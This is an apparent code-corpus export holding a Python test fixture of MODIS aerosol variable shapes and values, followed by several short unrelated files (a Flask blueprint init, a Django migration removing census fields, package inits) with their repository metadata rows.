'QualityWeight_Path_Radiance_Land_mod04': ['Solution_1_Land_mod04'], 'Error_Critical_Reflectance_Land_mod04': ['Solution_1_Land_mod04'], 'Critical_Reflectance_Land_mod04': ['Solution_1_Land_mod04'], 'Error_Path_Radiance_Land_mod04': ['Solution_1_Land_mod04'], 'Path_Radiance_Land_mod04': ['Solution_1_Land_mod04'], 'Standard_Deviation_Reflectance_Land_All_mod04': ['Solution_3_Land_mod04'], 'Mean_Reflectance_Land_All_mod04': ['Solution_3_Land_mod04'], 'Reflected_Flux_Land_And_Ocean_mod04': [], 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': [], 'Optical_Depth_Land_And_Ocean_mod04': [], 'Scattering_Angle_mod04': [], 'Cloud_Mask_QA_mod04': [], 'Sensor_Azimuth_mod04': [], 'Sensor_Zenith_mod04': [], 'Solar_Azimuth_mod04': [], 'Solar_Zenith_mod04': [], 'Scan_Start_Time_mod04': [], 'Latitude_mod04': [], 'Longitude_mod04': []}
var_dimensions = {'MODIS_Band_Ocean_mod04': ('MODIS_Band_Ocean_mod04',), 'MODIS_Band_Land_mod04': ('MODIS_Band_Land_mod04',), 'Solution_Index_mod04': ('Solution_Index_mod04',), 'Solution_Ocean_mod04': ('Solution_Ocean_mod04',), 'Solution_3_Land_mod04': ('Solution_3_Land_mod04',), 'Solution_2_Land_mod04': ('Solution_2_Land_mod04',), 'Solution_1_Land_mod04': ('Solution_1_Land_mod04',), 'Quality_Assurance_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04', 'QA_Byte_Ocean_mod04'), 'STD_Reflectance_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mean_Reflectance_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Number_Pixels_Used_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Fraction_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_by_models_ocean_mod04': ('Solution_Index_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Least_Squares_Error_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Transmitted_Flux_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Transmitted_Flux_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Angstrom_Exponent_2_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Angstrom_Exponent_1_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Backscattering_Ratio_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Backscattering_Ratio_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Asymmetry_Factor_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Asymmetry_Factor_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Condensation_Nuclei_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Effective_Radius_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mass_Concentration_Ocean_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Large_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Large_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Small_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Small_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Effective_Optical_Depth_Average_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Effective_Optical_Depth_Best_Ocean_mod04': ('MODIS_Band_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solution_Index_Ocean_Large_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solution_Index_Ocean_Small_mod04': ('Solution_Ocean_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Quality_Assurance_Crit_Ref_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04', 'QA_Byte_Land_mod04'), 'Quality_Assurance_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04', 'QA_Byte_Land_mod04'), 'STD_Reflectance_Land_mod04': ('MODIS_Band_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mean_Reflectance_Land_mod04': ('MODIS_Band_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Number_Pixels_Percentile_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Ratio_Small_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Fraction_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Transmitted_Flux_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Land_mod04': ('Solution_2_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Angstrom_Exponent_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mass_Concentration_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Estimated_Uncertainty_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Corrected_Optical_Depth_Land_mod04': ('Solution_2_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Continental_Optical_Depth_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Aerosol_Type_Land_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'QualityWeight_Critical_Reflectance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'QualityWeight_Path_Radiance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Error_Critical_Reflectance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Critical_Reflectance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Error_Path_Radiance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Path_Radiance_Land_mod04': ('Solution_1_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Standard_Deviation_Reflectance_Land_All_mod04': ('Solution_3_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Mean_Reflectance_Land_All_mod04': ('Solution_3_Land_mod04', 'Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Reflected_Flux_Land_And_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Optical_Depth_Land_And_Ocean_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Scattering_Angle_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Cloud_Mask_QA_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Sensor_Azimuth_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Sensor_Zenith_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solar_Azimuth_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Solar_Zenith_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Scan_Start_Time_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Latitude_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04'), 'Longitude_mod04': ('Cell_Along_Swath_mod04', 'Cell_Across_Swath_mod04')}
var_shapes = {'MODIS_Band_Ocean_mod04': (7,), 'MODIS_Band_Land_mod04': (5,), 'Solution_Index_mod04': (9,), 'Solution_Ocean_mod04': (2,), 'Solution_3_Land_mod04': (3,), 'Solution_2_Land_mod04': (3,), 'Solution_1_Land_mod04': (2,), 'Quality_Assurance_Ocean_mod04': (203, 135, 5), 'STD_Reflectance_Ocean_mod04': (7, 203, 135), 'Mean_Reflectance_Ocean_mod04': (7, 203, 135), 'Number_Pixels_Used_Ocean_mod04': (203, 135), 'Cloud_Fraction_Ocean_mod04': (203, 135), 'Optical_Depth_by_models_ocean_mod04': (9, 203, 135), 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': (2, 203, 135), 'Least_Squares_Error_Ocean_mod04': (2, 203, 135), 'Transmitted_Flux_Average_Ocean_mod04': (7, 203, 135), 'Transmitted_Flux_Best_Ocean_mod04': (7, 203, 135), 'Reflected_Flux_Average_Ocean_mod04': (7, 203, 135), 'Reflected_Flux_Best_Ocean_mod04': (7, 203, 135), 'Angstrom_Exponent_2_Ocean_mod04': (2, 203, 135), 'Angstrom_Exponent_1_Ocean_mod04': (2, 203, 135), 'Backscattering_Ratio_Average_Ocean_mod04': (7, 203, 135), 'Backscattering_Ratio_Best_Ocean_mod04': (7, 203, 135), 'Asymmetry_Factor_Average_Ocean_mod04': (7, 203, 135), 'Asymmetry_Factor_Best_Ocean_mod04': (7, 203, 135), 'Cloud_Condensation_Nuclei_Ocean_mod04': (2, 203, 135), 'Effective_Radius_Ocean_mod04': (2, 203, 135), 'Mass_Concentration_Ocean_mod04': (2, 203, 135), 'Optical_Depth_Large_Average_Ocean_mod04': (7, 203, 135), 'Optical_Depth_Large_Best_Ocean_mod04': (7, 203, 135), 'Optical_Depth_Small_Average_Ocean_mod04': (7, 203, 135), 'Optical_Depth_Small_Best_Ocean_mod04': (7, 203, 135), 'Effective_Optical_Depth_Average_Ocean_mod04': (7, 203, 135), 'Effective_Optical_Depth_Best_Ocean_mod04': (7, 203, 135), 'Solution_Index_Ocean_Large_mod04': (2, 203, 135), 'Solution_Index_Ocean_Small_mod04': (2, 203, 135), 'Quality_Assurance_Crit_Ref_Land_mod04': (203, 135, 5), 'Quality_Assurance_Land_mod04': (203, 135, 5), 'STD_Reflectance_Land_mod04': (5, 203, 135), 'Mean_Reflectance_Land_mod04': (5, 203, 135), 'Number_Pixels_Percentile_Land_mod04': (2, 203, 135), 'Optical_Depth_Ratio_Small_Land_mod04': (203, 135), 'Cloud_Fraction_Land_mod04': (203, 135), 'Transmitted_Flux_Land_mod04': (2, 203, 135), 'Reflected_Flux_Land_mod04': (3, 203, 135), 'Angstrom_Exponent_Land_mod04': (203, 135), 'Mass_Concentration_Land_mod04': (203, 135), 'Estimated_Uncertainty_Land_mod04': (2, 203, 135), 'Corrected_Optical_Depth_Land_mod04': (3, 203, 135), 'Continental_Optical_Depth_Land_mod04': (2, 203, 135), 'Aerosol_Type_Land_mod04': (203, 135), 'QualityWeight_Critical_Reflectance_Land_mod04': (2, 203, 135), 'QualityWeight_Path_Radiance_Land_mod04': (2, 203, 135), 'Error_Critical_Reflectance_Land_mod04': (2, 203, 135), 'Critical_Reflectance_Land_mod04': (2, 203, 135), 'Error_Path_Radiance_Land_mod04': (2, 203, 135), 'Path_Radiance_Land_mod04': (2, 203, 135), 'Standard_Deviation_Reflectance_Land_All_mod04': (3, 203, 135), 'Mean_Reflectance_Land_All_mod04': (3, 203, 135), 'Reflected_Flux_Land_And_Ocean_mod04': (203, 135), 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': (203, 135), 'Optical_Depth_Land_And_Ocean_mod04': (203, 135), 'Scattering_Angle_mod04': (203, 135), 'Cloud_Mask_QA_mod04': (203, 135), 'Sensor_Azimuth_mod04': (203, 135), 'Sensor_Zenith_mod04': (203, 135), 'Solar_Azimuth_mod04': (203, 135), 'Solar_Zenith_mod04': (203, 135), 'Scan_Start_Time_mod04': (203, 135), 'Latitude_mod04': (203, 135), 'Longitude_mod04': (203, 135)}
var_values = {'Solar_Zenith_mod04': (np.int16(6133), np.int16(8605), np.float64(7363.28049626), 0), 'Solution_Ocean_mod04': (np.int16(1), np.int16(2), np.float64(1.5), 0), 'Optical_Depth_by_models_ocean_mod04': (np.int16(0), np.int16(72), np.float64(7.95495495495), 246312), 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': (np.int16(366), np.int16(756), np.float64(589.216216216), 27368), 'Mass_Concentration_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'STD_Reflectance_Ocean_mod04': (np.int16(3), np.int16(64), np.float64(19.3822393822), 191576), 'Angstrom_Exponent_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Estimated_Uncertainty_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Transmitted_Flux_Average_Ocean_mod04': (np.int16(788), np.int16(992), np.float64(927.548262548), 191576), 'Solution_Index_Ocean_Large_mod04': (np.int16(5), np.int16(8), np.float64(6.10810810811), 54736), 'Transmitted_Flux_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Standard_Deviation_Reflectance_Land_All_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 80832), 'MODIS_Band_Ocean_mod04': (np.int16(470), np.int16(2130), np.float64(1079.85714286), 0), 'Longitude_mod04': (np.float32(-179.982162476), np.float32(179.997695923), np.float32(-3.1039249897), 0), 'Reflected_Flux_Best_Ocean_mod04': (np.int16(61), np.int16(278), np.float64(135.181467181), 191576), 'Optical_Depth_Large_Best_Ocean_mod04': (np.int16(7), np.int16(78), np.float64(32.9305019305), 191576), 'Quality_Assurance_Land_mod04': (np.int8(-16), np.int8(56), np.float64(13.6657539977), 84432), 'Angstrom_Exponent_1_Ocean_mod04': (np.int16(322), np.int16(1520), np.float64(972.986486486), 54736), 'Corrected_Optical_Depth_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 82215), 'Asymmetry_Factor_Best_Ocean_mod04': (np.int16(558), np.int16(752), np.float64(668.733590734), 191576), 'Optical_Depth_Land_And_Ocean_mod04': (np.int16(30), np.int16(126), np.float64(71.5135135135), 27368), 'Backscattering_Ratio_Best_Ocean_mod04': (np.int16(185), np.int16(271), np.float64(223.111969112), 191576), 'Error_Critical_Reflectance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Cloud_Fraction_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Scan_Start_Time_mod04': (np.float64(258076805.828041), np.float64(258077104.203138), np.float64(258076955.01559186), 0), 'QualityWeight_Critical_Reflectance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Number_Pixels_Used_Ocean_mod04': (np.int16(12), np.int16(166), np.float64(55.1891891892), 27368), 'Solution_Index_Ocean_Small_mod04': (np.int16(1), np.int16(4), np.float64(1.45945945946), 54736), 'Least_Squares_Error_Ocean_mod04': (np.int16(25), np.int16(119), np.float64(53.2027027027), 54736), 'Mean_Reflectance_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 137025), 'MODIS_Band_Land_mod04': (np.int16(470), np.int16(3750), np.float64(1574.8), 0), 'Optical_Depth_Small_Average_Ocean_mod04': (np.int16(0), np.int16(110), np.float64(22.0463320463), 191576), 'Effective_Optical_Depth_Average_Ocean_mod04': (np.int16(9), np.int16(163), np.float64(53.4633204633), 191576), 'Reflected_Flux_Average_Ocean_mod04': (np.int16(61), np.int16(277), np.float64(135.131274131), 191576), 'STD_Reflectance_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 137025), 'Aerosol_Type_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Cloud_Mask_QA_mod04': (np.int8(-33), np.int8(127), np.float64(70.4317825214), 0), 'Angstrom_Exponent_2_Ocean_mod04': (np.int16(140), np.int16(1150), np.float64(469.743243243), 54736), 'Mean_Reflectance_Land_All_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 80832), 'Reflected_Flux_Land_And_Ocean_mod04': (np.int16(160), np.int16(203), np.float64(181.810810811), 27368), 'Quality_Assurance_Crit_Ref_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 137025), 'Cloud_Condensation_Nuclei_Ocean_mod04': (np.float32(0.00106935936492), np.float32(0.0864628851414), np.float64(0.0409857227996), 54736), 'Asymmetry_Factor_Average_Ocean_mod04': (np.int16(556), np.int16(748), np.float64(668.092664093), 191576), 'Critical_Reflectance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Backscattering_Ratio_Average_Ocean_mod04': (np.int16(191), np.int16(273), np.float64(223.486486486), 191576), 'Optical_Depth_Small_Best_Ocean_mod04': (np.int16(0), np.int16(125), np.float64(22.6602316602), 191576), 'Mass_Concentration_Ocean_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Sensor_Azimuth_mod04': (np.int16(-9117), np.int16(14753), np.float64(2321.49684364), 0), 'Sensor_Zenith_mod04': (np.int16(30), np.int16(6511), np.float64(3130.63108922), 0), 'QualityWeight_Path_Radiance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Quality_Assurance_Ocean_mod04': (np.int8(-128), np.int8(119), np.float64(-74.2057655162), 109586), 'Cloud_Fraction_Ocean_mod04': (np.int16(17), np.int16(94), np.float64(72.1621621622), 27368), 'Continental_Optical_Depth_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Transmitted_Flux_Best_Ocean_mod04': (np.int16(783), np.int16(992), np.float64(926.474903475), 191576), 'Solution_2_Land_mod04': (np.int16(470), np.int16(660), np.float64(560.0), 0), 'Solar_Azimuth_mod04': (np.int16(-17997), np.int16(17997), np.float64(1609.12260536), 0), 'Mean_Reflectance_Ocean_mod04': (np.int16(42), np.int16(2896), np.float64(870.158301158), 191576), 'Latitude_mod04': (np.float32(55.5567932129), np.float32(78.8707275391), np.float32(67.7115859985), 0), 'Solution_Index_mod04': (np.int16(1), np.int16(9), np.float64(5.0), 0), 'Scattering_Angle_mod04': (np.int16(6912), np.int16(14469), np.float64(10445.5381135), 0), 'Reflected_Flux_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 82215), 'Effective_Optical_Depth_Best_Ocean_mod04': (np.int16(9), np.int16(181), np.float64(55.5714285714), 191576), 'Path_Radiance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Number_Pixels_Percentile_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Optical_Depth_Ratio_Small_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Solution_3_Land_mod04': (np.int16(470), np.int16(2130), np.float64(1086.66666667), 0), 'Solution_1_Land_mod04': (np.int16(470), np.int16(660), np.float64(565.0), 0), 'Effective_Radius_Ocean_mod04': (np.int16(179), np.int16(602), np.float64(317.554054054), 54736), 'Optical_Depth_Large_Average_Ocean_mod04': (np.int16(8), np.int16(74), np.float64(31.4362934363), 191576), 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': (np.int16(322), np.int16(742), np.float64(580.189189189), 54736), 'Error_Path_Radiance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888)}
def get_coord_dims(var):
return [dim for dim in var.dimensions if dim in var.file.variables.keys()]
if __name__ == '__main__':
ut.main()
| 473.287671
| 7,284
| 0.721187
| 9,500
| 69,100
| 4.873053
| 0.047368
| 0.056552
| 0.038407
| 0.053571
| 0.882274
| 0.838446
| 0.796043
| 0.765931
| 0.740161
| 0.707413
| 0
| 0.110033
| 0.112489
| 69,100
| 145
| 7,285
| 476.551724
| 0.644838
| 0
| 0
| 0.092308
| 0
| 0.015385
| 0.563864
| 0.30809
| 0
| 0
| 0
| 0
| 0.107692
| 1
| 0.076923
| false
| 0
| 0.038462
| 0.007692
| 0.130769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ae08e86e4a15e2484d92fbe02e4e6b6b013809a7
| 90
|
py
|
Python
|
fact-bounty-flask/api_es/__init__.py
|
ganeshpatro321/fact-Bounty
|
2f178dffa4a68de668ea584034ec8de9bb39db55
|
[
"Apache-2.0"
] | null | null | null |
fact-bounty-flask/api_es/__init__.py
|
ganeshpatro321/fact-Bounty
|
2f178dffa4a68de668ea584034ec8de9bb39db55
|
[
"Apache-2.0"
] | null | null | null |
fact-bounty-flask/api_es/__init__.py
|
ganeshpatro321/fact-Bounty
|
2f178dffa4a68de668ea584034ec8de9bb39db55
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint
api_es = Blueprint('api_es', __name__)
from . import routes
| 15
| 38
| 0.766667
| 13
| 90
| 4.846154
| 0.615385
| 0.380952
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 90
| 5
| 39
| 18
| 0.828947
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ae40233e94aa27179906864ceae69eb9a15666e9
| 78
|
py
|
Python
|
lspreader/__init__.py
|
noobermin/lspreader
|
b4989ba32507fdcf87cc226ba93422639ed5c5fb
|
[
"MIT"
] | null | null | null |
lspreader/__init__.py
|
noobermin/lspreader
|
b4989ba32507fdcf87cc226ba93422639ed5c5fb
|
[
"MIT"
] | null | null | null |
lspreader/__init__.py
|
noobermin/lspreader
|
b4989ba32507fdcf87cc226ba93422639ed5c5fb
|
[
"MIT"
] | 1
|
2015-12-28T20:17:22.000Z
|
2015-12-28T20:17:22.000Z
|
from .lspreader import read;
from .lspreader import readgridp4,readregionsp4;
| 26
| 48
| 0.833333
| 9
| 78
| 7.222222
| 0.666667
| 0.4
| 0.584615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.102564
| 78
| 2
| 49
| 39
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ae4052b588f3324b31251f5c0ab20b64d3538cb7
| 4,429
|
py
|
Python
|
server/ahj_app/migrations/0003_auto_20210312_1830.py
|
btansy/ahj-registry
|
b5340c7474f610964e828588572846ce4fb088aa
|
[
"MIT"
] | 4
|
2020-11-06T04:42:07.000Z
|
2021-07-28T18:09:26.000Z
|
server/ahj_app/migrations/0003_auto_20210312_1830.py
|
btansy/ahj-registry
|
b5340c7474f610964e828588572846ce4fb088aa
|
[
"MIT"
] | 38
|
2020-08-19T20:20:08.000Z
|
2022-01-23T03:22:51.000Z
|
server/ahj_app/migrations/0003_auto_20210312_1830.py
|
btansy/ahj-registry
|
b5340c7474f610964e828588572846ce4fb088aa
|
[
"MIT"
] | 8
|
2020-05-22T17:04:16.000Z
|
2021-01-15T19:14:36.000Z
|
# Generated by Django 3.1.3 on 2021-03-12 18:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ahj_app', '0002_citytemp_countytemp_cousubtemp_statetemp'),
]
operations = [
migrations.RemoveField(
model_name='citytemp',
name='CLASSFP',
),
migrations.RemoveField(
model_name='citytemp',
name='FUNCSTAT',
),
migrations.RemoveField(
model_name='citytemp',
name='LSAD',
),
migrations.RemoveField(
model_name='citytemp',
name='MTFCC',
),
migrations.RemoveField(
model_name='citytemp',
name='PCICBSA',
),
migrations.RemoveField(
model_name='citytemp',
name='PCINECTA',
),
migrations.RemoveField(
model_name='citytemp',
name='PLACEFP',
),
migrations.RemoveField(
model_name='citytemp',
name='PLACENS',
),
migrations.RemoveField(
model_name='citytemp',
name='STATEABBR',
),
migrations.RemoveField(
model_name='countytemp',
name='CBSAFP',
),
migrations.RemoveField(
model_name='countytemp',
name='CLASSFP',
),
migrations.RemoveField(
model_name='countytemp',
name='COUNTYFP',
),
migrations.RemoveField(
model_name='countytemp',
name='COUNTYNS',
),
migrations.RemoveField(
model_name='countytemp',
name='CSAFP',
),
migrations.RemoveField(
model_name='countytemp',
name='FUNCSTAT',
),
migrations.RemoveField(
model_name='countytemp',
name='LSAD',
),
migrations.RemoveField(
model_name='countytemp',
name='METDIVFP',
),
migrations.RemoveField(
model_name='countytemp',
name='MTFCC',
),
migrations.RemoveField(
model_name='countytemp',
name='STATEABBR',
),
migrations.RemoveField(
model_name='cousubtemp',
name='CLASSFP',
),
migrations.RemoveField(
model_name='cousubtemp',
name='CNECTAFP',
),
migrations.RemoveField(
model_name='cousubtemp',
name='COUNTYFP',
),
migrations.RemoveField(
model_name='cousubtemp',
name='COUSUBFP',
),
migrations.RemoveField(
model_name='cousubtemp',
name='COUSUBNS',
),
migrations.RemoveField(
model_name='cousubtemp',
name='FUNCSTAT',
),
migrations.RemoveField(
model_name='cousubtemp',
name='LSAD',
),
migrations.RemoveField(
model_name='cousubtemp',
name='MTFCC',
),
migrations.RemoveField(
model_name='cousubtemp',
name='NCTADVFP',
),
migrations.RemoveField(
model_name='cousubtemp',
name='NECTAFP',
),
migrations.RemoveField(
model_name='cousubtemp',
name='STATEABBR',
),
migrations.RemoveField(
model_name='statetemp',
name='DIVISION',
),
migrations.RemoveField(
model_name='statetemp',
name='FUNCSTAT',
),
migrations.RemoveField(
model_name='statetemp',
name='LSAD',
),
migrations.RemoveField(
model_name='statetemp',
name='MTFCC',
),
migrations.RemoveField(
model_name='statetemp',
name='REGION',
),
migrations.RemoveField(
model_name='statetemp',
name='STATEABBR',
),
migrations.RemoveField(
model_name='statetemp',
name='STATEFP',
),
migrations.RemoveField(
model_name='statetemp',
name='STATENS',
),
migrations.RemoveField(
model_name='statetemp',
name='STUSPS',
),
]
| 26.052941
| 69
| 0.489275
| 303
| 4,429
| 7.006601
| 0.174917
| 0.385775
| 0.477626
| 0.551107
| 0.861988
| 0.861988
| 0.052756
| 0.052756
| 0
| 0
| 0
| 0.007143
| 0.399413
| 4,429
| 169
| 70
| 26.207101
| 0.790977
| 0.01016
| 0
| 0.846626
| 1
| 0
| 0.156321
| 0.010269
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006135
| 0
| 0.02454
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae5fc2cda0ba8429e580d74b929dba2489efc2f3
| 156
|
py
|
Python
|
src/sage/manifolds/all.py
|
defeo/sage
|
